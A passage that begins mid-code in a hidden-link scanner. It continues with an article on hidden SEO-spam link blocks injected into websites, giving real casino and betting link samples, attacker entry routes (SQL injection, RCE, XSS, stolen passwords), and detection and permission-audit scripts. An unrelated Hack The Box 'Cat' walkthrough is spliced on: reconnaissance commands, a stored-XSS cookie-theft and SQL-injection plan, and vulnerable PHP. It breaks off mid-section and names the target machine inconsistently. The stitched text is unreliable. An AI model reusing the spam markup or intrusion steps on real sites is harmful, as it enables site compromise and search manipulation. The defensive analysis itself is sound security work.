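        a = dict(attrs)
        classes = set((a.get("class") or "").split())
        hidden = style_hides(a.get("style")) or bool(classes & self.hidden_classes)
        hidden = hidden or (self.stack[-1] if self.stack else False)  # inherit from parent
        self.stack.append(hidden)
        if tag == "a" and hidden and self._external(a.get("href") or ""):
            rel = (a.get("rel") or "").lower()
            self.findings.append({"href": a["href"], "dofollow": "nofollow" not in rel})
        if tag in VOID_TAGS:
            self.stack.pop()  # void elements never get an end tag

    def handle_startendtag(self, tag, attrs):   # <br/>-style self-closing tags
        self.handle_starttag(tag, attrs)
        if tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if self.stack:
            self.stack.pop()

def scan_html(html, site_host):
    """Return one finding per off-site link that sits inside hidden markup."""
    css = "\n".join(re.findall(r"<style[^>]*>(.*?)</style>", html, re.I | re.S))
    scanner = HiddenLinkScanner(site_host, hidden_classes_from_css(css))
    scanner.feed(html)
    scanner.close()
    return scanner.findings

def looks_like_seo_spam(findings, min_links=3):
    """Verdict heuristic: several hidden off-site links, at least half of them followable."""
    return len(findings) >= min_links and 2 * sum(f["dofollow"] for f in findings) >= len(findings)

# Constructed sample page: one legitimate visible external link plus three
# hiding techniques (display:none, zero-size box, hidden class from <style>).
SAMPLE_HTML = """<html><head>
<style type="text/css">.ads-gold {height: 0px;overflow: hidden;}.ads-gold a {color: transparent;}</style>
</head><body>
<p>Visit our <a href="/contact">contact page</a> or <a href="https://partner.example.org">partner</a>.</p>
<div style="display: none;">
kw1 <a href="https://spam-one.invalid/" rel="dofollow" target="_self">spam-one</a> kw2
kw3 <a href="https://spam-two.invalid" target="_self">spam-two</a> kw4<br/>
</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">
kw5 <a href="https://spam-three.invalid/" rel="nofollow">spam-three</a> kw6</div>
<div class="ads-gold">
Cassino <a href="https://spam-four.invalid" target="_blank">four</a>
<a href="https://spam-five.invalid" target="_blank">five</a>
<a href="https://news.example.com/post">same-site subdomain, ignored</a>
</div></body></html>"""

if __name__ == "__main__":
    hits = scan_html(SAMPLE_HTML, "example.com")
    print(*hits, sep="\n")
    print("verdict:", "SEO spam" if looks_like_seo_spam(hits) else "clean")
```

Links that are visible, relative, or on the site’s own subdomains are ignored, so a normal page with partner links produces no findings.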

The combination of styles that sets the block dimensions to zero is less obvious than display: none; because the element is technically present in the rendering, although it is not visible to the user. Nevertheless, it is worth noting that modern search engine security algorithms, such as Google Penguin, detect this technique too. To counter this, malicious actors may employ more complex techniques for evading detection. Here is another example:

<script src="files/layout/js/slider3d.js?v=0d6651e2"></script><script src="files/layout/js/layout.js?v=51a52ad1"></script>
<style type="text/css">.ads-gold {height: 280px;overflow: auto;color: transparent;}.ads-gold::-webkit-scrollbar {  display: none;}.ads-gold a {color: transparent;}.ads-gold {font-size: 10px;}.ads-gold {height: 0px;overflow: hidden;}</style>
<div class="ads-gold">
Ganhe RΓ‘pido nos Jogos Populares do Cassino Online <a href="https://580-bet.com" target="_blank">580bet</a>
Cassino <a href="https://bet-7k.com" target="_blank">bet 7k</a>: DiversΓ£o e Grandes VitΓ³rias Esperam por VocΓͺ
Aposte e VenΓ§a no Cassino <a href="https://leao-88.com" target="_blank">leao</a> – Jogos FΓ‘ceis e Populares
Jogos Populares e Grandes PrΓͺmios no Cassino Online <a href="https://luck-2.com" target="_blank">luck 2</a>
Descubra os Jogos Mais Populares no Cassino <a href="https://john-bet.com" target="_blank">john bet</a> e Ganhe
<a href="https://7755-bet.com" target="_blank">7755 bet</a>: Apostas FΓ‘ceis, Grandes Oportunidades de VitΓ³ria
Jogue no Cassino Online <a href="https://cbet-88.com" target="_blank">cbet</a> e Aumente suas Chances de Ganhar
Ganhe PrΓͺmios IncrΓ­veis com Jogos Populares no Cassino <a href="https://bet7-88.com" target="_blank">bet7</a>
Cassino <a href="https://pk55-88.com" target="_blank">pk55</a>: Onde a Sorte EstΓ‘ ao Seu Lado
Experimente o Cassino <a href="https://8800-bet.com" target="_blank">8800 bet</a> e Ganhe com Jogos Populares
Ganhe Facilmente no Cassino Online <a href="https://doce-88.com" target="_blank">doce</a>
Aposte e VenΓ§a no Cassino <a href="https://bet-4-br.com" target="_blank">bet 4</a>
Jogos Populares e Grandes PremiaΓ§Γ΅es na <a href="https://f12--bet.com" target="_blank">f12bet</a>
Descubra a DiversΓ£o e VitΓ³ria no Cassino <a href="https://bet-7-br.com" target="_blank">bet7</a>
Aposte nos Jogos Mais Populares do Cassino <a href="https://ggbet-88.com" target="_blank">ggbet</a>
Ganhe PrΓͺmios RΓ‘pidos no Cassino Online <a href="https://bet77-88.com" target="_blank">bet77</a>
Jogos FΓ‘ceis e RΓ‘pidos no Cassino <a href="https://mrbet-88.com" target="_blank">mrbet</a>
Jogue e Ganhe com Facilidade no Cassino <a href="https://bet61-88.com" target="_blank">bet61</a>
Cassino <a href="https://tvbet-88.com" target="_blank">tvbet</a>: Onde a Sorte EstΓ‘ Ao Seu Lado
Aposte nos Melhores Jogos do Cassino Online <a href="https://pgwin-88.com" target="_blank">pgwin</a>
Ganhe Grande no Cassino <a href="https://today-88.com" target="_blank">today</a> com Jogos Populares
Cassino <a href="https://fuwin-88.com" target="_blank">fuwin</a>: Grandes VitΓ³rias Esperam por VocΓͺ
Experimente os Melhores Jogos no Cassino <a href="https://brwin-88.com" target="_blank">brwin</a>
</div></body>

Aside from the properties we are already familiar with, which are responsible for concealing a block (height: 0px, color: transparent, overflow: hidden), and the class name that hints at its contents (<style type="text/css">.ads-gold), this example contains script tags at the very beginning: <script src="files/layout/js/slider3d.js?v=0d6651e2"></script> and <script src="files/layout/js/layout.js?v=51a52ad1"></script>. These indicate that external JavaScript can dynamically control the page content, for example by adding or changing hidden links, that is, modifying this block in real time.

This is a more advanced approach than the ones in the previous examples. Yet it is also detected by filters responsible for identifying suspicious manipulations.

Other parameters and attributes exist that attackers use to conceal a link block. These, however, can also be detected:

  • The property visibility: hidden; can sometimes be seen instead of display: none;.
  • With position: absolute;, the block with hidden links may not have a zero size, but instead be located far beyond the visible area of the page. This can be set, for example, via the property left: -9232px;, as in the example below.
<div style="position: absolute; left: -9232px">
<a href="https://romabet.cam/">Ψ±ΩˆΩ…Ψ§ Ψ¨Ψͺ</a><br>
<a href="https://mahbet.cam/">Ω…Ψ§Ω‡ Ψ¨Ψͺ</a><br>
<a href="https://pinbahis.com.co/">ΩΎΫŒΩ† Ψ¨Ψ§Ω‡ΫŒΨ³</a><br>
<a href="https://bettingmagazine.org/">Ψ¨Ω‡ΨͺΨ±ΫŒΩ† سایΨͺ Ψ΄Ψ±Ψ· Ψ¨Ω†Ψ―ΫŒ</a><br>
<a href="https://1betcart.com/">Ψ¨Ψͺ Ϊ©Ψ§Ψ±Ψͺ</a><br>
<a href="https:// yasbet.com.co/">یاس Ψ¨Ψͺ</a><br>
<a href="https://yekbet.cam/">یک Ψ¨Ψͺ</a><br>
<a href="https://megapari.cam/">Ω…Ϊ―Ψ§ΩΎΨ§Ψ±ΫŒ </a><br>
<a href="https://onjabet.net/">Ψ§ΩˆΩ†Ψ¬Ψ§ Ψ¨Ψͺ</a><br>
<a href="https://alvinbet.org/">alvinbet.org</a><br>
<a href="https://2betboro.com/">Ψ¨Ψͺ برو</a><br>
<a href="https://betfa.cam/">Ψ¨Ψͺ فا</a><br>
<a href="https://betforward.help/">Ψ¨Ψͺ فوروارد</a><br>
<a href="https://1xbete.org/">ΩˆΨ§Ω† ایکس Ψ¨Ψͺ</a><br>
<a href="https://1win-giris.com.co/">1win giriş</a><br>
<a href="https://betwiner.org/">Ψ¨Ψͺ ΩˆΫŒΩ†Ψ±</a><br>
<a href="https://4shart.com/">Ψ¨Ω‡ΨͺΨ±ΫŒΩ† سایΨͺ Ψ΄Ψ±Ψ· Ψ¨Ω†Ψ―ΫŒ Ψ§ΫŒΨ±Ψ§Ω†ΫŒ</a><br>
<a href="https://1xbetgiris.cam">1xbet giriş</a><br>
<a href="https://1kickbet1.com/">ΩˆΨ§Ω† کیک Ψ¨Ψͺ</a><br>
<a href="https://winbet-bet.com/">ΩˆΫŒΩ† Ψ¨Ψͺ</a><br>
<a href="https://ritzobet.org/">ریΨͺزو Ψ¨Ψͺ</a><br>

How attackers place hidden links on other people’s websites

To place hidden links, attackers typically exploit website configuration errors and vulnerabilities. This may be a weak or compromised password for an administrator account, plugins or an engine that have not been updated in a long time, poor filtering of user inputs, or security issues on the hosting provider’s side. Furthermore, attackers may attempt to exploit the human factor, for example, by setting up targeted or mass phishing attacks in the hope of obtaining the website administrator’s credentials.

Let us examine in detail the various mechanisms through which an attacker gains access to editing a page’s HTML code.

  • Compromise of the administrator password. An attacker may guess the password, use phishing to trick the victim into giving it away, or steal it with the help of malware. Furthermore, the password may be found in a database of leaked credentials. Site administrators frequently use simple passwords for control panel protection or, even worse, leave the default password, thereby simplifying the task for the attacker.
    After gaining access to the admin panel, the attacker can directly edit the page’s HTML code or install their own plugins with hidden SEO blocks.
  • Exploitation of CMS (WordPress, Joomla, Drupal) vulnerabilities. If the engine or plugins are out of date, attackers use known vulnerabilities (SQL Injection, RCE, or XSS) to gain access to the site’s code. After that, depending on the level of access gained by exploiting the vulnerability, they can modify template files (header.php, footer.php, index.php, etc.), insert invisible blocks into arbitrary site pages, and so on.
    In SQL injection attacks, the hacker injects their malicious SQL code into a database query. Many websites, from news portals to online stores, store their content (text, product descriptions, and news) in a database. If an SQL query, such as SELECT * FROM posts WHERE id = '$id' allows passing arbitrary data, the attacker can use the $id field to inject their code. This allows the attacker to change the content of records, for example, by inserting HTML with hidden blocks.
    In RCE (remote code execution) attacks, the attacker gains the ability to run their own commands on the server where the website runs. Unlike SQL injections, which are limited to the database, RCE provides almost complete control over the system. For example, it allows the attacker to create or modify site files, upload malicious scripts, and, of course, inject invisible blocks.
    In an XSS (cross-site scripting) attack, the attacker injects their JavaScript code directly into the web page by using vulnerable input fields, such as those for comments or search queries. When another user visits this page, the malicious script automatically executes in their browser. Such a script enables the attacker to perform various malicious actions, including stealthily adding a hidden <div> block with invisible links to the page. For XSS, the attacker does not need direct access to the server or database, as in the case with SQL injection or RCE; they only need to find a single vulnerability on the website.
  • An attack via the hosting provider. In addition to directly hacking the target website, an attacker may attempt to gain access to the website through the hosting environment. If the hosting provider’s server is poorly secured, there is a risk of it being compromised. Furthermore, if multiple websites or web applications run on the same server, a vulnerability in one of them can jeopardize all other projects. The attacker’s capabilities depend on the level of access to the server. These capabilities may include: injecting hidden blocks into page templates, substituting files, modifying databases, connecting external scripts to multiple websites simultaneously, and so forth. Meanwhile, the website administrator may not notice the problem because the vulnerability is being exploited within the server environment rather than the website code.

Note that the appearance of hidden links on a website is not always a sign of a cyberattack. The issue often arises during the development phase, for example if an illegal copy of a template is downloaded to save money or if the project is carried out by an unscrupulous web developer.

Why attackers place hidden blocks on websites

One of the most obvious goals for injecting hidden blocks into other people’s websites is to steal the PageRank from the victim. The more popular and authoritative the website is, the more interesting it is to attackers. However, this does not mean that moderate- or low-traffic websites are safe. As a rule, administrators of popular websites and large platforms do their best to adhere to security rules, so it is not so easy to get close to them. Therefore, attackers may target less popular – and less protected – websites.

As previously mentioned, this approach to promoting websites is easily detected and blocked by search engines. In the short term, though, attackers still benefit from this: they manage to drive traffic to the websites that interest them until search engine algorithms detect the violation.

Even though the user does not see the hidden block and cannot click the links, attackers can use scripts to boost traffic to their websites. One possible scenario involves JavaScript creating an iframe in the background or sending an HTTP request to the website from the hidden block, which then receives information about the visit.

Hidden links can lead not just to pornographic or other questionable websites but also to websites with low-quality content whose sole purpose is to be promoted and subsequently sold, or to phishing and malicious websites. In more sophisticated schemes, the script that provides β€œvisits” to such websites may load malicious code into the victim’s browser.

Finally, hidden links allow attackers to lower the reputation of the targeted website and harm its standing with search engines. This threat is especially relevant in light of the fact that algorithms such as Google Penguin penalize websites hosting questionable links. Attackers may use these techniques as a tool for unfair competition, hacktivism, or any other activity that involves discrediting certain organizations or individuals.

Interestingly, in 2025, we have more frequently encountered hidden blocks with links to pornographic websites and online casinos on various legitimate websites. With low confidence, we can suggest that this is partly due to the development of neural networks, which make it easy to automate such attacks, and partly due to the regular updates to Google’s anti-spam systems, the latest of which was completed at the end of September 2025: attackers may have rushed to maximize their gains before the search engine made it a little harder for them.

Consequences for the victim website

The consequences for the victim website can vary in severity. At a minimum, the presence of hidden links placed by unauthorized parties hurts search engine reputation, which may lead to lower search rankings or even complete exclusion from search results. However, even without any penalties, the links disrupt the internal linking structure because they lead to external websites and pass on a portion of the victim’s weight to them. This negatively impacts the rankings of key pages.

Although unseen by visitors, hidden links can be discovered by external auditors, content analysis systems, or researchers who report such findings in public reports. This is something that can undermine trust in the website. For example, sites where our categorization engine detects links to pornography pages will be classified as β€œAdult content”. Consequently, all of our clients who use web filters to block this category will be unable to visit the website. Furthermore, information about a website’s category is published on our Kaspersky Threat Intelligence Portal and available to anyone wishing to look up its reputation.

If the website is being used to distribute illegal or fraudulent content, the issue enters the legal realm, with the owner potentially facing lawsuits from copyright holders or regulators. For example, if the links lead to websites that distribute pirated content, the site may be considered an intermediary in copyright infringement. If the hidden block contains malicious scripts or automatic redirects to questionable websites, such as phishing pages, the owner can be charged with fraud or some other cybercrime.

How to detect a hidden link block on your website

The simplest and most accessible method for any user to check a website for a hidden block is to view its source code in the browser. This is very easy to do. Navigate to the website, press Control+U, and the website’s code will open in the next tab. Search (Control+F) the code for the following keywords: display: none, visibility: hidden, opacity: 0, height: 0, width: 0, position: absolute. In addition, you can check for keywords that are characteristic of the hidden content itself. When it comes to links that point to adult or gambling sites, you should look for porn, sex, casino, card, and the like.

A slightly more complex method is using web developer tools to investigate the DOM for invisible blocks. After the page fully loads, open DevTools (F12) in the browser and go to the Elements tab. Search (Control+F) for keywords such as <a, iframe, display: none, hidden, opacity. Hover your cursor over suspicious elements in the code so the browser highlights their location on the page. If the block occupies zero area or is located outside the visible area, that is an indicator of a hidden element. Check the Computed tab for the selected element; there, you can see the applied CSS styles and confirm that it is hidden from the user’s view.

You can also utilize specialized SEO tools. These are typically third-party solutions that scan website SEO data and generate reports. They can provide a report about suspicious links as well. Few of them are free, but when selecting a tool, you should be guided primarily by the vendor’s reputation rather than price. It is better to use tried-and-true, well-known services that are known to be free of malicious or questionable payloads. Examples of these trusted services include Google Search Console, Bing Webmaster Tools, OpenLinkProfiler, and SEO Minion.

Another way to discover hidden SEO spam on a website is to check the CMS itself and its files. First, you should scan the database tables for suspicious HTML tags with third-party links that may have been inserted by attackers, and also carefully examine the website’s template files (header.php, footer.php, and index.php) and included modules for unfamiliar or suspicious code. Pay particular attention to encrypted insertions, unclear scripts, or links that should not originally be present in the website’s structure.
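To automate the source-code and DevTools checks described above, and to run the same check over HTML pulled from CMS tables or template files, here is a small offline scanner. It is an added example, not part of the original article; it applies the hiding criteria discussed in the text (display: none, visibility: hidden, opacity: 0, zero dimensions, transparent colour, far off-screen absolute positioning), resolves simple .class rules from <style> blocks the way the .ads-gold example requires, and reports every link inside a hidden element. The 1000 px off-screen threshold and the sample page with placeholder domains are assumptions.

```python
import re
from html.parser import HTMLParser

VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img", "input", "link", "meta", "param", "source", "track", "wbr"}
SIMPLE_HIDERS = (("display", "none"), ("visibility", "hidden"), ("color", "transparent"))
OFFSCREEN_PX = 1000  # assumption: a box pushed at least this far outside the page counts as hidden


def parse_declarations(css):
    """'overflow: auto; height:0pt' -> {'overflow': 'auto', 'height': '0pt'} (lower-cased)."""
    decls = {}
    for part in css.split(";"):
        if ":" in part:
            name, value = part.split(":", 1)
            decls[name.strip().lower()] = value.strip().lower()
    return decls


def parse_class_rules(style_text):
    """Merge the declarations of simple '.class { ... }' rules; later rules override earlier ones
    (the repeated .ads-gold blocks above collapse into one dictionary). Other selectors are ignored."""
    rules = {}
    for selector, body in re.findall(r"([^{}]+)\{([^{}]*)\}", style_text):
        m = re.fullmatch(r"\.([\w-]+)", selector.strip())
        if m:
            rules.setdefault(m.group(1), {}).update(parse_declarations(body))
    return rules


def _px(value):
    m = re.fullmatch(r"(-?\d+(?:\.\d+)?)(px|pt)?", value or "")
    return float(m.group(1)) if m else None


def hiding_reasons(decls):
    """Why an element with these effective declarations would be invisible to a visitor."""
    reasons = [f"{n}:{v}" for n, v in SIMPLE_HIDERS if decls.get(n) == v]
    if _px(decls.get("opacity")) == 0:
        reasons.append("opacity:0")
    zero_h, zero_w = _px(decls.get("height")) == 0, _px(decls.get("width")) == 0
    if zero_h and zero_w:
        reasons.append("zero size")
    elif zero_h and decls.get("overflow") in ("hidden", "auto"):
        reasons.append("zero height with overflow clipped")
    if decls.get("position") in ("absolute", "fixed"):
        for side in ("left", "top", "right", "bottom"):
            offset = _px(decls.get(side))
            if offset is not None and offset <= -OFFSCREEN_PX:
                reasons.append(f"{side}:{decls[side]} off-screen")
    return reasons


class HiddenLinkScanner(HTMLParser):
    """Single pass over the document: record every <a href> hidden itself or inside a hidden ancestor."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.class_rules, self.in_style = {}, False
        self.stack = []     # one list of hiding reasons per open element ([] means visible)
        self.findings = []  # (href, reasons)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "style":
            self.in_style = True
        decls = {}
        for cls in (attrs.get("class") or "").split():
            decls.update(self.class_rules.get(cls, {}))
        decls.update(parse_declarations(attrs.get("style") or ""))  # inline style wins over class rules
        reasons = hiding_reasons(decls)
        inherited = [r for frame in self.stack for r in frame]
        if tag == "a" and attrs.get("href") and (inherited or reasons):
            self.findings.append((attrs["href"], inherited + reasons))
        if tag not in VOID_TAGS:  # <br>, <img> etc. never close, so they must not enter the stack
            self.stack.append(reasons)

    def handle_endtag(self, tag):
        if tag == "style":
            self.in_style = False
        if tag not in VOID_TAGS and self.stack:
            self.stack.pop()

    def handle_data(self, data):
        if self.in_style:  # <style> text arrives here; collect its class rules for later elements
            for cls, decls in parse_class_rules(data).items():
                self.class_rules.setdefault(cls, {}).update(decls)


def find_hidden_links(html):
    """Return [(href, [reason, ...]), ...] for the links a visitor cannot see."""
    scanner = HiddenLinkScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample reproducing the three hiding patterns discussed above, with placeholder domains.
SAMPLE_PAGE = """<html><head><style type="text/css">.ads-gold {height: 280px;overflow: auto;color: transparent;}
.ads-gold::-webkit-scrollbar {display: none;}.ads-gold a {color: transparent;}.ads-gold {font-size: 10px;}
.ads-gold {height: 0px;overflow: hidden;}</style></head><body>
<p>Visible text with a <a href="https://partner.example/">normal link</a>.</p>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;"><a href="https://spam-1.example/" rel="dofollow">keyword</a></div>
<div class="ads-gold">Casino text <a href="https://spam-2.example" target="_blank">casino</a></div>
<div style="position: absolute; left: -9232px"><a href="https://spam-3.example/">one</a><br><a href="https://spam-4.example/">two</a><br></div>
</body></html>"""
```

Running find_hidden_links(SAMPLE_PAGE) flags the four placeholder spam links with their reasons and leaves the visible partner link alone; the same function can be fed the body of a CMS post pulled from the database.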

Additionally, you can look up your website’s reputation on the Kaspersky Threat Intelligence Portal. If you find it in an uncharacteristic category – typically β€œAdult content”, β€œSexually explicit”, or β€œGambling” – there is a high probability that there is a hidden SEO spam block embedded in your website.

How to protect your website

To prevent hidden links from appearing on your website, avoid unlicensed templates, themes, and other pre-packaged solutions. The entire site infrastructure must be built only on licensed and official solutions. The same principle applies to webmasters and companies you hire to build your website: we recommend checking their work for hidden links, but also for vulnerabilities in general. Never cut corners when it comes to security.

Keep your CMS, themes, and plugins up to date, as new versions often patch known vulnerabilities that attackers can exploit. Delete any unused plugins and themes. The fewer unnecessary components are installed, the lower the risk of an exploit in one of the extensions, plugins, or themes. It is worth noting that this risk never disappears completely: it is still there even with a minimal set of components, as long as they are outdated or poorly secured.

To protect files and the server, it is important to properly configure access permissions. On servers running Linux and other Unix-like systems, use 644 for files and 755 for folders. This means that the owner can open folders, and read and modify folders and files, while the group and other users can only read files and open folders. If write access is not necessary, for example in template folders, forbid it altogether to lower the risk of malicious actors making unauthorized changes. Furthermore, you must set up regular, automatic website backups so that data can be quickly restored if there is an issue.
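As an added example (not part of the original article), the script below audits a web root against the 644/755 baseline just described and against the rule that template folders should not be writable at all. The folder names treated as template folders and the constructed sample tree are assumptions; permission bits are read with lstat, so symlinks are skipped rather than followed.

```python
import os
import stat
import tempfile
from pathlib import Path

EXPECTED_FILE_MODE = 0o644   # owner read/write, everyone else read-only
EXPECTED_DIR_MODE = 0o755    # owner full, everyone else read and traverse
# Assumption: directories with these names hold templates, whose files should carry no write bit at all.
READ_ONLY_DIR_NAMES = {"templates", "themes"}


def audit_permissions(web_root):
    """Walk web_root and return (relative_path, actual_mode, problem) for every entry off the baseline."""
    web_root = Path(web_root)
    findings = []
    for dirpath, _dirnames, filenames in os.walk(web_root):
        dirpath = Path(dirpath)
        in_read_only = bool(READ_ONLY_DIR_NAMES & set(dirpath.relative_to(web_root).parts))
        for path, is_dir in [(dirpath, True)] + [(dirpath / f, False) for f in filenames]:
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # a symlink's own mode bits are not enforced; audit its target separately
            mode = stat.S_IMODE(st.st_mode)
            if is_dir:
                expected = EXPECTED_DIR_MODE
            elif in_read_only:
                expected = EXPECTED_FILE_MODE & ~0o200  # 0o444: nobody may write template files
            else:
                expected = EXPECTED_FILE_MODE
            if mode & 0o022:
                problem = "writable by group or others"
            elif mode & ~expected & 0o222:
                problem = "write bit set where it should be absent"
            elif mode != expected:
                problem = f"mode differs from expected {oct(expected)}"
            else:
                continue
            findings.append((str(path.relative_to(web_root)), oct(mode), problem))
    return findings


def build_sample_root():
    """Constructed web root used to exercise the audit; not a real site."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    os.chmod(root, 0o755)
    layout = {  # relative path -> mode; directories end with '/'
        "index.php": 0o644,
        "config.php": 0o666,            # world-writable: the classic mistake
        "uploads/": 0o777,              # world-writable directory
        "templates/": 0o755,
        "templates/header.php": 0o644,  # owner may still write a template file
        "templates/footer.php": 0o444,  # correct for a template file
    }
    for rel, mode in layout.items():
        path = root / rel
        if rel.endswith("/"):
            path.mkdir()
        else:
            path.write_text("<?php // placeholder\n")
        os.chmod(path, mode)
    return root
```

audit_permissions(build_sample_root()) reports config.php, uploads and templates/header.php and nothing else; point it at a real document root to get the same list for your site.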

Additionally, it is worth using web application firewalls (WAFs), which help block malicious requests and protect the site from external attacks. This solution is available in Kaspersky DDoS Protection.

To protect the administrator panel, use only strong passwords and 2FA (Two-Factor Authentication) at all times. You would be well-advised to restrict access to the admin panel by IP address if you can. Only a limited group of individuals should be granted admin privileges.

Hack The Box: Cat Machine Walkthrough – Medium Difficulty

By: darknite
Reading Time: 13 minutes

Introduction

This write-up details the β€œCat” machine from Hack The Box, a Medium-rated Linux challenge.

Objective on Cat Machine

The goal is to complete the β€œCat” machine by accomplishing the following objectives:

User Flag:

To obtain the user flag, an attacker first exploits a Stored Cross-Site Scripting (XSS) vulnerability in the user registration form, which allows stealing the administrator’s session cookie. With this stolen session, the attacker accesses the admin panel and exploits an SQL Injection flaw to extract sensitive user credentials from the database. After cracking these credentials, SSH access is gained as a regular user, enabling the retrieval of the user flagβ€”a secret token proving user-level access.

Root Flag:

For the root flag, privilege escalation is performed by finding a vulnerable image processing script owned by the root user. The attacker crafts a malicious image payload that executes unauthorised commands with root privileges. This leads to obtaining a root shellβ€”the highest level of system accessβ€”allowing capture of the root flag, which confirms full control over the machine.

Reconnaissance and Enumeration on Cat Machine

Establishing Connectivity

I connected to the Hack The Box environment via OpenVPN using my credentials, running all commands from a Parrot OS virtual machine. The target IP address for the Dog machine was 10.10.11.53.

Initial Scanning

To identify open ports and services, I ran an Nmap scan:

nmap -sC -sV 10.10.11.53 -oA initial

Nmap Output:

β”Œβ”€[dark@parrot]─[~/Documents/htb/cat]
└──╼ $ nmap -sC -sV -oA initial -Pn 10.10.11.53
# Nmap 7.94SVN scan initiated Tue Jun 17 10:05:26 2025 as: nmap -sC -sV -oA initial -Pn 10.10.11.53
Nmap scan report for 10.10.11.53
Host is up (0.017s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
|   256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
|_  256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://cat.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun 17 10:05:33 2025 -- 1 IP address (1 host up) scanned in 7.38 seconds

Analysis:

  • Port 22 (SSH): OpenSSH 8.2p1 on Ubuntu 4ubuntu0.11 risks remote code execution if unpatched (e.g., CVE-2021-28041).
  • Port 80 (HTTP): Apache 2.4.41, vulnerable to path traversal (CVE-2021-41773), redirects to cat.htb, hinting at virtual host misconfigurations.

Web Enumeration:

Perform directory fuzzing to uncover hidden files and directories.

gobuster dir -u http://cat.htb -w /opt/common.txt

Let’s perform directory enumeration with Gobuster to identify any potentially useful resources.

Gobuster Output:

Web Path Discovery (Gobuster):

  • /.git Directory: Exposed Git repository risks source code leakage, revealing sensitive data like credentials or application logic.
  • /admin.php, /join.php, and Other Paths: Discovered sensitive endpoints may lack authentication, enabling unauthorised access or privilege escalation.

The website features a typical interface with user registration, login, and image upload functionality, but the presence of an exposed .git directory and accessible admin endpoints indicates significant security weaknesses.

Git Repository Analysis with git-dumper

I utilised the git-dumper tool to clone the exposed Git repository by executing the command git-dumper http://cat.htb/.git/ git. Subsequently, I employed a Git extraction tool to retrieve critical source code files, including join.php, admin.php, and accept_cat.php, for further analysis.

Within the cloned Git repository, several PHP files were identified, meriting further examination for potential vulnerabilities or insights.

Source Code Analysis and Review on Cat Machine

Source Code Review of accept_cat.php

The accept_cat.php file is intended to let the admin user 'axel' accept a cat by inserting its name into the accepted_cats table and deleting the corresponding entry from the cats table. The script correctly verifies the user’s session and restricts actions to POST requests, which is good practice. However, it constructs the insertion SQL query by directly embedding the $cat_name variable without any sanitisation or use of prepared statements:

$sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
$pdo->exec($sql_insert);

This exposes the application to SQL injection attacks, as malicious input in catName could manipulate the query and compromise the database. On the other hand, the deletion query is properly parameterised, reducing risk. To secure the script, the insertion should also use prepared statements with bound parameters. Overall, while session checks and request validation are handled correctly, the insecure insertion query represents a critical vulnerability in accept_cat.php.

Vulnerability Review of admin.php

This admin page lets the user β€˜axel’ manage cats by viewing, accepting, or rejecting them. It correctly checks if the user is logged in as β€˜axel’ before allowing access and uses prepared statements to fetch cat data from the database safely. The cat details are displayed with proper escaping to prevent cross-site scripting attacks.

However, the page sends AJAX POST requests to accept_cat.php and delete_cat.php without any protection against Cross-Site Request Forgery (CSRF). This means an attacker could potentially trick the admin into performing actions without their consent. Also, based on previous code, the accept_cat.php script inserts data into the database without using prepared statements, which can lead to SQL injection vulnerabilities.

To fix these issues, CSRF tokens should be added to the AJAX requests and verified on the server side. Additionally, all database queries should use prepared statements to ensure user input is handled securely. While the page handles session checks and output escaping well, the missing CSRF protection and insecure database insertion are serious security concerns.

Security Audit of view_cat.php

The view_cat.php script restricts access to the admin user 'axel' and uses prepared statements to safely query the database, preventing SQL injection. However, it outputs dynamic data such as cat_name, photo_path, age, birthdate, weight, username, and created_at directly into the HTML without escaping. This creates a Cross-Site Scripting (XSS) vulnerability because if any of these fields contain malicious code, it will execute in the admin’s browser.

The vulnerable code includes:

Cat Details: <?php echo $cat['cat_name']; ?>
<img src="<?php echo $cat['photo_path']; ?>" alt="<?php echo $cat['cat_name']; ?>" class="cat-photo">
<strong>Name:</strong> <?php echo $cat['cat_name']; ?><br>
<strong>Age:</strong> <?php echo $cat['age']; ?><br>

To mitigate this, all output should be passed through htmlspecialchars() to encode special characters and prevent script execution. Additionally, validating the image src attribute is important to avoid loading unsafe or external resources. Without these measures, the page remains vulnerable to XSS attacks.

Input Validation Analysis of join.php

The provided PHP code is vulnerable to several security issues, primarily due to improper input handling and weak security practices. Below is an explanation of the key vulnerabilities, followed by the relevant code snippets:

  1. Cross-Site Scripting (XSS): The code outputs $success_message and $error_message without sanitisation, making it susceptible to XSS attacks. User inputs (e.g., $_GET['username'], $_GET['email']) are directly echoed, allowing malicious scripts to be injected.
<?php if ($success_message != ""): ?>
   <div class="message"><?php echo $success_message; ?></div>
   <?php endif; ?>
   <?php if ($error_message != ""): ?>
   <div class="error-message"><?php echo $error_message; ?></div>
   <?php endif; ?>
  2. Insecure Password Storage: Passwords are hashed using MD5 (md5($_GET['password'])), which is cryptographically weak and easily cracked.
$password = md5($_GET['password']);
  3. SQL Injection Risk: While prepared statements are used, the code still processes unsanitised $_GET inputs, which could lead to other injection vulnerabilities if they are not validated properly.
  4. Insecure Data Transmission: Using $_GET for sensitive data such as passwords exposes them in URLs and risks interception.

To mitigate these, use htmlspecialchars() for output, adopt secure hashing (e.g., password_hash()), validate inputs, and use $_POST for sensitive data.

Workflow Evaluation of contest.php

The PHP code for the cat contest registration page has multiple security flaws due to weak input handling and poor security practices. Below are the key vulnerabilities with relevant code snippets:

